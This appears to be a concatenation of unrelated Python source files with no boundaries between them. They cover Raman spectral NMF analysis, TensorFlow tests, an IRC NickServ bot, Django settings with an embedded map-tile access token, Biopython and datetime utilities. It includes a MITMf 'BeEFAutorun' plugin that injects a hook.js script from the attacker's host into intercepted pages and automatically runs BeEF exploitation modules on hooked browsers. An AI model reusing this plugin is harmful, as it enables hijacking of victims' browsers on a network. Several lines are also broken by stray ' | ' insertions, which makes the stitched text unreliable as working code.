fullramandataarray=parseui.readfullramanarray(pathd['ramanfile'])#opens or creates
with open(pathd['allspectra'], mode='wb') as f:
numpy.save(f, fullramandataarray)
ramaninfod=parseui.ramaninfod
#parseui.exec_()
#ramaninfod['number of spectra']
#ramaninfod['xdata']
#ramaninfod['ydata']
#ramaninfod['Wavenumbers_str']
#ramaninfod['Spectrum 0 index']
ramaninfod['xdata']/=1000.
ramaninfod['ydata']/=1000.#convert to mm
ramaninfod['xshape']= len(np.unique(ramaninfod['xdata']))
ramaninfod['yshape']= len(np.unique(ramaninfod['ydata']))
ramaninfod['dx']= (ramaninfod['xdata'].max()-ramaninfod['xdata'].min())/(ramaninfod['xshape']-1)
ramaninfod['dy']= (ramaninfod['ydata'].max()-ramaninfod['ydata'].min())/(ramaninfod['yshape']-1)
nx=dx_smp/ramaninfod['dx']
ny=dy_smp/ramaninfod['dy']
ntot=nx*ny
ramanreshape=lambda arr: np.reshape(arr, (ramaninfod['xshape'], ramaninfod['yshape'])).T[::-1, ::-1]
ramannewshape=(ramaninfod['yshape'], ramaninfod['xshape'])
image_of_x=ramanreshape(ramaninfod['xdata'])
image_of_y=ramanreshape(ramaninfod['ydata'])
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].min(), ramaninfod['ydata'].max()]
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].max(), ramaninfod['ydata'].min()]
extent=[image_of_x[0, 0], image_of_x[-1, -1], image_of_y[0, 0], image_of_y[-1, -1]]
def ramanimshow(im, **kwargs):
plt.imshow(im, origin='lower', interpolation='none', aspect=1, extent=extent, **kwargs)
if os.path.isfile(pathd['nmfdata']):
with open(pathd['nmfdata'], mode='rb') as f:
tempd=pickle.load(f)
data_decomp_all,data_components_all,rgbimagedata=[tempd[k] for k in 'data_decomp_all,data_components_all,rgbimagedata'.split(',')]
else:
data_decomp_all,data_components_all = doNMF(fullramandataarray,4)
#rgbimagedata=imGen(data_decomp_all,ramaninfod)
rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
for i, arr in enumerate(data_decomp_all[:, :3].T):
if nmf_scaling_algorithm_for_image=='scale_by_max':
arr/=arr.max()
elif nmf_scaling_algorithm_for_image=='scale_log_by_max':
arr[arr!=0]=numpy.log10(arr[arr!=0])
arr/=arr.max()
rgbimagedata[:, :, i]=np.array([ramanreshape(arr)])
tempd={}
tempd['data_decomp_all']=data_decomp_all
tempd['data_components_all']=data_components_all
tempd['rgbimagedata']=rgbimagedata
with open(pathd['nmfdata'], mode='wb') as f:
        pickle.dump(tempd, f)
#plt.clf()
#rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
#for i, arr in enumerate(data_decomp_all[:, :3].T):
# arr[arr!=0]=numpy.log10(arr[arr!=0])
# rgbimagedata[:, :, i]=np.array([ramanreshape(arr/arr.max())])
#ramanimshow(rgbimagedata)
#plt.show()
if 1 and os.path.isfile(pathd['blobd']):
with open(pathd['blobd'], mode='rb') as f:
blobd=pickle.load(f)
else:
edges = np.zeros(ramannewshape, dtype='uint8')
searchforoptimalbool=isinstance(find_edges_sigma_value, list)
ltemp=find_edges_sigma_value if searchforoptimalbool else [find_edges_sigma_value]
plt.clf()
for sigmacount, sigmaval in enumerate(ltemp):
if searchforoptimalbool:
plt.subplot(2, len(find_edges_sigma_value), sigmacount+1)
for i in range(data_decomp_all.shape[1]):
if nmf_scaling_algorithm_for_edge=='scale_by_max':
datadecomptemp=data_decomp_all[:,i]/data_decomp_all[:,i].max()
elif nmf_scaling_algorithm_for_edge=='scale_log_by_max':
datadecomptemp=data_decomp_all[:,i]
datadecomptemp[datadecomptemp!=0]=numpy.log10(datadecomptemp[datadecomptemp!=0])
datadecomptemp/=datadecomptemp.max()
arr=np.uint8(ramanreshape(datadecomptemp)*254)
edgetemp=findEdges(arr, sigma=sigmaval)
# plt.imshow(edgetemp)
# plt.show()
edges[np.where(edgetemp>0)] = 244
ramanimshow(edges)
if searchforoptimalbool:
plt.subplot(2, len(find_edges_sigma_value), len(find_edges_sigma_value)+sigmacount+1)
else:
plt.savefig(pathd['edges'])
plt.clf()
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
image_of_inds=ramanreshape(numpy.arange(ramaninfod['number of spectra']))
mapfill = np.zeros(ramannewshape, dtype='uint8')
blobd={}
l_mask=[cv2.drawContours(np.zeros(ramannewshape, dtype='uint8'), contours, i, color=1, thickness=-1) for i in range(len(contours))]
l_imageinds=[numpy.where(maski==1) for maski in l_mask]
l_xycen=np.array([[image_of_x[imageindsi].mean(), image_of_y[imageindsi].mean()] for imageindsi in l_imageinds])
indstomerge=sorted([(count2+count+1, count) for count, xy0 in enumerate(l_xycen[:-1]) for count2, xy1 in enumerate(l_xycen[count+1:]) if ((xy0-xy1)**2).sum()<(dx_smp**2+dy_smp**2)/5.])[::-1]
#indstomerge has highest index first so merge going down
for indhigh, indlow in indstomerge:
# imageinds=l_imageinds.pop(indhigh)
# mask=l_mask.pop(indhigh)
imageinds=l_imageinds[indhigh]
mask=l_mask[indhigh]
        l_mask[indlow][imageinds]=1#update only the masks and then update everything else afterwards
l_imageinds=[numpy.where(maskj==1) for maskj in l_mask]
l_xycen=np.array([[image_of_x[imageindsj].mean(), image_of_y[imageindsj].mean()] for imageindsj in l_imageinds])
for imageinds, mask in zip(l_imageinds, l_mask):
        indsinblob=sorted(list(image_of_inds[imageinds]))
"""Tests for control_flow_ops.py."""
import tensorflow.python.platform
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import standard_ops as tf
from tensorflow.python.platform import googletest
class GroupTestCase(TensorFlowTestCase):
def _StripNode(self, nd):
snode = graph_pb2.NodeDef(name=nd.name, op=nd.op, input=nd.input)
if nd.device:
snode.device = nd.device
return snode
def _StripGraph(self, gd):
"""Copy gd keeping only, node.name, node.op, node.input, and node.device."""
return graph_pb2.GraphDef(node=[self._StripNode(nd) for nd in gd.node])
def testGroup_NoDevices(self):
with ops.Graph().as_default() as g:
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
c = tf.constant(0, name="c")
tf.group(a.op, b.op, c.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const"}
node { name: "b" op: "Const"}
node { name: "c" op: "Const"}
node { name: "root" op: "NoOp" input: "^a" input: "^b" input: "^c" }
""", self._StripGraph(gd))
def testGroup_OneDevice(self):
with ops.Graph().as_default() as g:
with g.device("/task:0"):
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
tf.group(a.op, b.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const" device: "/task:0" }
node { name: "b" op: "Const" device: "/task:0" }
node { name: "root" op: "NoOp" input: "^a" input: "^b" device: "/task:0" }
""", self._StripGraph(gd))
def testGroup_MultiDevice(self):
with ops.Graph().as_default() as g:
with g.device("/task:0"):
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
with g.device("/task:1"):
c = tf.constant(0, name="c")
d = tf.constant(0, name="d")
with g.device("/task:2"):
tf.group(a.op, b.op, c.op, d.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const" device: "/task:0"}
node { name: "b" op: "Const" device: "/task:0"}
node { name: "c" op: "Const" device: "/task:1"}
node { name: "d" op: "Const" device: "/task:1"}
node { name: "root/NoOp" op: "NoOp" input: "^a" input: "^b"
device: "/task:0" }
node { name: "root/NoOp_1" op: "NoOp" input: "^c" input: "^d"
device: "/task:1" }
no | de { name: "root" op: "NoOp" input: "^root/NoOp" input: "^root/NoOp_1"
device: "/task:2" }
""", self._StripGraph(gd))
class ShapeTestCase(TensorFlowTestCase):
def testShape(self):
with ops.Graph().as_default():
tensor = tf.constant([1.0, 2.0])
self.assertEquals([2], tensor.get_shape())
self.assertEquals([2],
control_flow_ops.with_dependencies(
[tf.constant(1.0)], tensor).get_shape())
if __name__ == "__main__":
googletest.main()
#!/usr/bin/python3
'''
This is a * sort * of static method but is ugly since the
function is really global and not in the class.
'''
class Book:
num = 0
def __init__(self, price):
self.__price = price
        Book.num += 1
def printit(self):
print('price is', self.__price)
def setPrice(self, newprice):
self.__price = newprice
def getNumBooks():
return Book.num
# lets create some books...
b1 = Book(14)
b2 = Book(13)
# lets access the static member and the static methods...
print('Book.num (direct access) is ', Book.num)
print('getNumBooks() is ', getNumBooks())
try:
print(b1.getNumBooks())
except TypeError as e:
    print('no, cannot access the static method via the instance')
# access the static member through an instance...
print(b1.num)
print(b2.num)
b3 = Book(12)
print(b1.num)
print(b2.num)
print(b3.num)
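# For comparison, a minimal sketch of the idiomatic alternative (Book2 is a
# hypothetical rewrite, not part of the original example): declaring the
# counter accessor with @staticmethod makes it callable from both the class
# and its instances.
class Book2:
    num = 0

    def __init__(self, price):
        self.__price = price
        Book2.num += 1

    @staticmethod
    def getNumBooks():
        return Book2.num

b = Book2(10)
print(Book2.getNumBooks())  # works on the class...
print(b.getNumBooks())      # ...and on an instance, too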
# -*- coding: utf-8 -*-
import bot
import time
"""
load irc/auth/nickserv
nickserv set password hunter2
config set modules.nickserv.enabled True
config set modules.nickserv.ghost True
nickserv register email@do.main
nickserv verify register myaccount c0d3numb3r
nickserv identify
"""
class M_NickServ(bot.Module):
index = "nickserv"
def register(self):
self.addhook("recv", "recv", self.recv)
self.addhook("login", "login", self.login)
self.addhook("nickinuse", "433", self.nickinuse)
self.addsetting("=name", "")
self.addsetting("=password", "")
self.addsetting("enabled", False)
self.addsetting("auto", True)
self.addsetting("ghost", True)
self.lastns = ""
self.lastnstime = time.time()
self.ghosting = True
self.addcommand(self.register_c, "register",
"Register with NickServ.",
["[-name=account name]", "email"])
self.addcommand(self.verify_c, "verify register",
"Verify with NickServ.", ["account", "code"])
self.addcommand(self.identify_c, "identify",
"Identify with NickServ.", [])
self.addcommand(self.setp, "set password",
"Set the NickServ pass | word.", ["password"])
self.addcommand(self.setn, "set name",
"Set the NickServ name.", ["[name]"])
def setn(self, context, args):
args.default("name", "")
self.setsetting("name", args.getstr("name"))
return "Set name to: %s" % self.getsetting | ('name')
def setp(self, context, args):
args.default("password", "")
self.setsetting("password", args.getstr("password"))
return "Set password to: %s" % self.getsetting('password')
def name(self):
return self.getsetting("name") or self.server.settings.get(
'server.user.nick')
def recv(self, context):
if context.user[0]:
if context.code('notice') and context.user[0].lower() == 'nickserv':
if context.reciever == self.server.nick:
if self.lastns and time.time() - self.lastnstime < 30:
self.server.sendto("NOTICE", self.lastns,
"NickServ -- %s" % (
context.text,
))
if self.ghosting:
self.server.setnick(self.server.wantnick)
self.ghosting = False
def nickinuse(self, r):
if (self.getsetting("enabled") and
self.getsetting("password") and self.getsetting("ghost")):
self.server.setnick(self.server.nick + "_")
self.server.sendto("PRIVMSG", "nickserv", "GHOST %s %s" % (
self.server.wantnick,
self.getsetting("password"),
))
self.ghosting = True
r.append(True)
def identify(self):
self.server.log("AUTH", "Identifying with NickServ.")
self.server.sendto("PRIVMSG", "nickserv", "IDENTIFY %s %s" % (
self.name(),
self.getsetting("password"),
))
def identify_c(self, context, args):
context.exceptrights(["admin"])
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.identify()
self.lastns = context.user[0]
self.lastnstime = time.time()
def register_c(self, context, args):
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.server.sendto("PRIVMSG", "nickserv", "REGISTER %s %s %s" % (
self.name() if args.getbool('name') else '',
self.getsetting("password"),
args.getstr('email'),
))
self.lastns = context.user[0]
self.lastnstime = time.time()
def verify_c(self, context, args):
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.server.sendto("PRIVMSG", "nickserv", "VERIFY REGISTER %s %s" % (
args.getstr('account'),
args.getstr('code'),
))
self.lastns = context.user[0]
self.lastnstime = time.time()
def login(self):
if self.getsetting("enabled") and self.getsetting("password"):
if self.getsetting("auto"):
self.identify()
bot.register.module(M_NickServ)
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
import json
import threading
from time import sleep
from core.beefapi import BeefAPI
from core.utils import SystemConfig, shutdown
from plugins.plugin import Plugin
from plugins.Inject import Inject
mitmf_logger = logging.getLogger("mitmf")
class BeefAutorun(Inject, Plugin):
name = "BeEFAutorun"
optname = "beefauto"
desc = "Injects B | eEF hooks & autoruns modules based on Browser and/or OS type"
version = "0.3"
has_opts = False
def initialize(self, options):
self.options = options
self.ip_address = SystemConfig.getIP(options.interface)
Inject.initialize(self, options)
self.tree_info.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
beefconfig = self.config['MITMf']['BeEF']
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[BeEFAutorun] Error logging in to BeEF!")
def startThread(self):
self.autorun()
def onConfigChange(self):
self.initialize(self.options)
def autorun(self):
already_ran = []
already_hooked = []
while True:
mode = self.config['BeEFAutorun']['mode']
for hook in self.beef.hooked_browsers.online:
if hook.session not in already_hooked:
mitmf_logger.info("{} [BeEFAutorun] Joined the horde! [id:{}, type:{}-{}, os:{}]".format(hook.ip, hook.id, hook.name, hook.version, hook.os))
already_hooked.append(hook.session)
self.black_ips.append(hook.ip)
if mode == 'oneshot':
if hook.session not in already_ran:
self.execModules(hook)
already_ran.append(hook.session)
elif mode == 'loop':
self.execModules(hook)
sleep(10)
sleep(1)
def execModules(self, hook):
all_modules = self.config['BeEFAutorun']["ALL"]
targeted_modules = self.config['BeEFAutorun']["targets"]
if all_modules:
mitmf_logger.info("{} [BeEFAutorun] Sending generic modules".format(hook.ip))
for module, options in all_modules.iteritems():
for m in self.beef.modules.findbyname(module):
resp = m.run(hook.session, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
else:
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
sleep(0.5)
if (hook.name and hook.os):
for os in targeted_modules:
if (os == hook.os) or (os in hook.os):
mitmf_logger.info("{} [BeEFAutorun] Sending targeted modules".format(hook.ip))
for browser in targeted_modules[os]:
if browser == hook.name:
for module, options in targeted_modules[os][browser].iteritems():
for m in self.beef.modules.findbyname(module):
resp = m.run(hook.session, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
else:
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
sleep(0.5)
import logging
from abc import abstractmethod, ABCMeta
from urllib import request
class UrlShortener(metaclass=ABCMeta):
@abstractmethod
def shorten(self, url: str) -> str:
pass
def log(self, url):
logging.info("Short URL: {}".format(url))
class Off(UrlShortener):
def shorten(self, url: str):
return url
class TinyURL(UrlShortener):
def shorten(self, url: str) -> str:
response = request.urlopen("http://tinyurl.com/api-create.php?url={}".format(url))
url = str(response.read(), encoding="ascii")
self.log(url)
return url
def get_url_shortener(name: str) -> UrlShortener:
if name == "tinyurl":
return TinyURL()
return Off()
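# Usage sketch (URL hypothetical; TinyURL performs a real network request):
#   shortener = get_url_shortener("tinyurl")
#   print(shortener.shorten("https://example.com/some/very/long/path"))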
BASE_TEMPLATE_DIR = os.path.join(os.path.dirname(BASE_DIR), 'templates')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_TEMPLATE_DIR,
os.path.join(BASE_TEMPLATE_DIR, 'allauth')],
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader'
],
},
},
]
AUTHENTICATION_BACKENDS = [
'core.backends.Auth',
'django.contrib.auth.backends.ModelBackend',
'accounts.backends.AuthenticationBackend',
'accounts.backends.PhoneAuthenticationBackend'
]
ACCOUNT_AUTHENTICATION_METHOD = 'username_email'
DJOSER = {
'SITE_NAME': SITE_NAME,
'SET_PASSWORD_RETYPE': True,
'PASSWORD_RESET_CONFIRM_RETYPE': True,
'PASSWORD_RESET_CONFIRM_URL':
'account/password/reset/confirm/{uid}/{token}',
'ACTIVATION_URL': 'account/activate/{uid}/{token}',
# 'SEND_ACTIVATION_EMAIL': True,
'SERIALIZERS': {
'set_password_retype': 'accounts.serializers.ChangePasswordSerializer'
}
}
CORS_ORIGIN_ALLOW_ALL = False
LOGIN_REDIRECT_URL = '/dashboard/'
LOGIN_URL = '/account/login/'
LOGOUT_URL = '/account/logout/'
WSGI_APPLICATION = 'config.wsgi.application'
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = LOGIN_URL
ACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS = 2
ACCOUNT_FORMS = {
'signup': 'accounts.forms.RegisterForm',
'profile': 'accounts.forms.ProfileForm',
}
ACCOUNT_ADAPTER = 'accounts.adapter.DefaultAccountAdapter'
ACCOUNT_LOGOUT_ON_GET = True
ACCOUNT_LOGOUT_REDIRECT_URL = LOGIN_URL
ACCOUNT_LOGIN_ATTEMPTS_TIMEOUT = 86400
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': ('django.contrib.auth.'
'password_validation.UserAttributeSimilarityValidator'),
},
{
'NAME':
'django.contrib.auth.password_validation.MinimumLengthValidator',
'OPTIONS': {
'min_length': 10,
}
},
{
'NAME':
        'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.NumericPasswordValidator',
},
{
'NAME':
'accounts.validators.CharacterTypePasswordValidator'
},
{
'NAME':
'accounts.validators.EmailSimilarityValidator'
},
]
OSM_ATTRIBUTION = _(
"Base map data © <a href=\"http://openstreetmap.org\">"
"OpenStreetMap</a> contributors under "
"<a href=\"http://opendatacommons.org/licenses/odbl/\">ODbL</a>"
)
DIGITALGLOBE_ATTRIBUTION = _("Imagery © DigitalGlobe")
DIGITALGLOBE_TILESET_URL_FORMAT = (
'https://{{s}}.tiles.mapbox.com/v4/digitalglobe.{}'
'/{{z}}/{{x}}/{{y}}.png?access_token='
'pk.eyJ1IjoiZGlnaXRhbGdsb2JlIiwiYSI6ImNpaHhtenBmZjAzYW1'
'1a2tvY2p3MnpjcGcifQ.vF1gH0mGgK31yeHC1k1Tqw'
)
LEAFLET_CONFIG = {
'TILES': [
(
_("OpenStreetMap"),
'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',
{'attribution': OSM_ATTRIBUTION,
'maxZoom': 19}
),
(
_("+Vivid imagery"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('n6ngnadl'),
{'attribution': DIGITALGLOBE_ATTRIBUTION,
'maxZoom': 22}
),
(
_("Recent imagery"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('nal0g75k'),
{'attribution': DIGITALGLOBE_ATTRIBUTION,
'maxZoom': 22}
),
(
_("+Vivid imagery with OpenStreetMap"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('n6nhclo2'),
{'attribution': (OSM_ATTRIBUTION, DIGITALGLOBE_ATTRIBUTION),
'maxZoom': 22}
),
(
_("Recent imagery with OpenStreetMap"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('nal0mpda'),
{'attribution': (OSM_ATTRIBUTION, DIGITALGLOBE_ATTRIBUTION),
'maxZoom': 22}
),
],
'RESET_VIEW': False,
'PLUGINS': {
'draw': {
'js': '/static/leaflet/draw/leaflet.draw.js'
},
'groupedlayercontrol': {
'js': '/static/js/leaflet.groupedlayercontrol.min.js',
'css': '/static/css/leaflet.groupedlayercontrol.min.css'
}
}
}
# Invalid names for Cadasta organizations, projects, and usernames
CADASTA_INVALID_ENTITY_NAMES = ['add', 'new']
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
LOCALE_PATHS = [os.path.join(BASE_DIR, 'locale')]
LANGUAGES = [
# ('ar', _('Arabic')), (hiding until RTL support fixed)
('en', _('English')),
('fr', _('French')),
# ('de', _('German')), (hiding until translation coverage >= 75%)
('es', _('Spanish')),
('id', _('Indonesian')),
('it', _('Italian')),
('pt', _('Portuguese'))
# ('sw', _('Swahili')), (hiding until translation coverage >= 75%)
]
MEASUREMENT_DEFAULT = 'metric'
MEASUREMENTS = [
('metric', _('Metric')),
('imperial', _('Imperial')),
]
DEFAULT_AVATAR = '/static/img/avatar_sm.jpg'
ACCEPTED_AVATAR_TYPES = ['image/png', 'image/jpeg']
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
MEDIA_ROOT = '/opt/cadasta/media'
MEDIA_URL = '/media/'
STATIC_ROOT = '/opt/cadasta/static'
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'sass_processor.finders.CssFinder',
'compressor.finders.CompressorFinder',
)
# Required for bootstrap-sass
# https://github.com/jrief/django-sass-processor
SASS_PRECISION = 8
SASS_PROCESSOR_ROOT = os.path.join(STATIC_ROOT, 'cache')
SASS_PROCESSOR_INCLUDE_DIRS = (
'/opt/cadasta/node_modules',
)
SASS_OUTPUT_STYLE = 'compressed'
# django-compressor
# https://django-compressor.readthedocs.io/en/latest/
# change to false for debug
COMPRESS_ENABLED = True
COMPRESS_CSS_FILTERS = (
'compressor.filters.css_default.CssAbsoluteFilter',
'compressor.filters.cssmin.CSSMinFilter',
)
COMPRESS_URL = STATIC_URL
COMPRESS_ROOT = STATIC_ROOT
COMPRESS_STORAGE = 'compressor.storage.GzipCompressorFileStorage'
COMPRESS_OUTPUT_DIR = 'cache'
JSONATTRS_SCHEMA_SELECTORS = {
'spatial.spatialunit': (
'project.organization.pk',
'project.pk', 'project.current_questionnaire'
),
'spatial.spatialrelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
),
'party.party': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire',
'type'
),
'party.partyrelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
),
'party.tenurerelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
)
}
ATTRIBUTE_GROUPS = {
'location_attributes': {
'app_label': 'spatial',
'model': 'spatialunit',
'label': 'Location'
},
'party_attributes': {
'app_label': 'party',
'model': 'party',
'label': 'Party'
},
'location_relationship_attributes': {
'app_label': 'spatial',
'model': 'spatialrelationship',
'label': 'Spatial relationship'
},
'party_relationship_attributes': {
'app_label': 'party',
'model': 'partyrelationship',
'label': 'Party relationship'
},
'tenure_relationship_attributes': {
'app_label': 'party',
'model': 'tenurerelationship',
'label': 'Tenure Relationship'
}
}
ICON_URL = ('https://s3-us-west-2.amazonaws.com/cadasta-resources'
            '/icons/{}.png')
"""
Base class for all nodes in the scene graph. It is implemented
using the composite pattern.
Responsibilities:
- Hold the relative position to its parent.
- Blit itself on the parent.
- Dirty flag itself to trigger regeneration of surface.
"""
class Component(object):
def __init__(self):
self._position = (0, 0)
self._dirty = True
self._surface = None
def draw(self, parent):
self._recreate_surface()
if self._surface and parent:
parent.blit(self._surface, self._position)
def set_position(self, position):
self._position = position
    def surface(self):
return None
def dirty(self):
self._dirty = True
def _recreate_surface(self):
if self._dirty:
            self._surface = self.surface()
self._dirty = False
"""
Decorator to mark component methods that change the look
of the surface and therefore need to trigger regeneration.
"""
def recreate_surface(function):
def wrapper(self, *args):
self.dirty()
return function(self, *args)
return wrapper
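# A minimal sketch of a concrete component (the Label name and its string
# "surface" are illustrative only, not from the original file): surface()
# is regenerated lazily the next time draw() runs after a @recreate_surface
# method marked the component dirty.
class Label(Component):
    def __init__(self, text=""):
        super(Label, self).__init__()
        self._text = text

    @recreate_surface
    def set_text(self, text):
        # Changes the look, so the decorator flags the surface for rebuild.
        self._text = text

    def surface(self):
        # A real component would render onto a drawing surface here;
        # a plain string stands in for one in this sketch.
        return self._text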
from Bio import Entrez
from Bio import SeqIO
from Bio import Seq
from Bio.Alphabet import IUPAC
genomes = ["Escherichia coli str. K-12 substr. MC4100 complete genome","Escherichia coli Nissle 1917, complete genome","Escherichia coli LY180, complete genome"]
genomes_short = ["K12","Nissle","LY180"]
for n,genome in enumerate(genomes):
Entrez.email = "fake@drexel.edu"
handle = Entrez.esearch(db="nucleotide", term=genome)
    records = Entrez.read(handle)
handle.close()
handle = Entrez.efetch(db="nucleotide", id=records['IdList'][0], rettype="gb", retmode="text")
record = SeqIO.read(handle, "genbank")
handle.close()
mygenes = ["thrA","mogA","dnaK","nhaA","ksgA"]
output_handle=open("seq"+str(n+1)+".fna","w")
for feature in record.features:
if feature.type=='CDS':
if 'gene' in feature.qualifiers:
if feature.qualifiers['gene'][0] in mygenes:
output_handle.write(">%s_%s\n%s\n" % (feature.qualifiers['gene'][0], genomes_short[n], str(feature.extract(record.seq))))
output_handle.close()
from pylons_common.lib.log import create_logger
from pylons_common.lib.utils import pluralize
logger = create_logger('pylons_common.lib.datetime')
from datetime import datetime, timedelta
DATE_FORMAT_ACCEPT = [u'%Y-%m-%d %H:%M:%S', u'%Y-%m-%d %H:%M:%SZ', u'%Y-%m-%d', u'%m-%d-%Y', u'%m/%d/%Y', u'%m.%d.%Y', u'%b %d, %Y']
popular_timezones = [u'US/Eastern', u'US/Central', u'US/Mountain', u'US/Pacific', u'US/Alaska', u'US/Hawaii', u'US/Samoa',
u'Europe/London', u'Europe/Paris', u'Europe/Istanbul', u'Europe/Moscow',
u'America/Puerto_Rico', u'America/Buenos_Aires', u'America/Sao_Paulo',
u'Asia/Dubai', u'Asia/Calcutta', u'Asia/Rangoon', u'Asia/Bangkok', u'Asia/Hong_Kong', u'Asia/Tokyo',
u'Australia/Brisbane', u'Australia/Sydney',
u'Pacific/Fiji']
def convert_date(value):
"""
converts a string into a datetime object
"""
if not value:
return None
if isinstance(value, datetime):
return value
def try_parse(val, format):
try:
dt = datetime.strptime(val, format)
except ValueError:
dt = None
return dt
converted_value = None
for format in DATE_FORMAT_ACCEPT:
converted_value = converted_value or try_parse(value, format)
if not converted_value:
raise ValueError('Cannot convert supposed date %s' % value)
return converted_value
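# Quick usage sketch: each accepted format parses to the same datetime.
#   convert_date(u'2017-03-01')   -> datetime(2017, 3, 1, 0, 0)
#   convert_date(u'03/01/2017')   -> datetime(2017, 3, 1, 0, 0)
#   convert_date(u'Mar 01, 2017') -> datetime(2017, 3, 1, 0, 0)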
def get_timezones():
import pytz
timezones = {0:u'UTC'}
for tzname in pytz.common_timezones:
tzname = tzname.decode('utf-8')
tz = pytz.timezone(tzname)
dt = datetime.utcnow()
# in theory, this is more elegant, but tz.dst (timezone daylight savings - 0 if off 1 if on) is returning 0 for everything
#offset = tz.utcoffset(dt) - tz.dst(dt)
# we do this try/except to avoid the possibility that pytz fails at localization
# see https://bugs.launchpad.net/pytz/+bug/207500
try:
offset = dt.replace(tzinfo=pytz.utc) - tz.localize(dt)
seconds = offset.days * 86400 + offset.seconds
minutes = seconds / 60
hours = minutes / 60
# adjust for offsets that are greater than 12 hours (these are repeats of other offsets)
if hours > 12:
hours = hours - 24
elif hours < -11:
hours = hours + 24
this_tz = timezones.get(hours, None)
if not this_tz:
timezones[hours] = tzname
elif tzname in popular_timezones:
# overwrite timezones with popular ones if equivalent
timezones[hours] = tzname
        except Exception:
logger.exception("Localization failure for timezone " + tzname)
return timezones
def relative_date_str(date, now=None, time=False):
'''
Will return a string like 'Today', 'Tomorrow' etc.
'''
if not now: now = datetime.utcnow()
if not date: return 'unknown'
diff = date.date() - now.date()
def day_time(day_str):
return '%s%s' % (day_str, time and ' at %s' % date.strftime("%I:%M %p") or '')
if diff.days == 0:
return day_time('Today')
elif diff.days == -1:
return day_time('Yesterday')
elif diff.days == 1:
return day_time('Tomorrow')
    elif diff.days < 0 and diff.days >= -7:  # within one week back
return '%s ago' % pluralize(-diff.days, '{0} days', '1 day')
    elif diff.days > 0 and diff.days < 7:  # within one week ahead
return 'in %s' % pluralize(diff.days, '{0} days', '1 day')
else:
return date.strftime("%b %e, %Y")## on 10/03/1980
def now():
    return datetime.utcnow()
#
# This file contains functions and constants to talk
# to and from a Novation Launchpad via MIDI.
#
# Created by paul for mididings.
from mididings import *
# MEASURES - constants useful for the Pad
side = list(range(0, 8))
longside = list(range(0, 9))
step = 16 # vertical gap on pad
FirstCtrl = 104 # ctrl of first toprow key
# COLORS
# Colors on the Launchpad are determined by event velocity/value.
# Each key can be lit with red or green light (or both),
# with brightness 0 (off) - 3 (max).
# For convenience, define also the constants:
black = 4 # better not to use zero
red = 3
orange = 19
green = 48
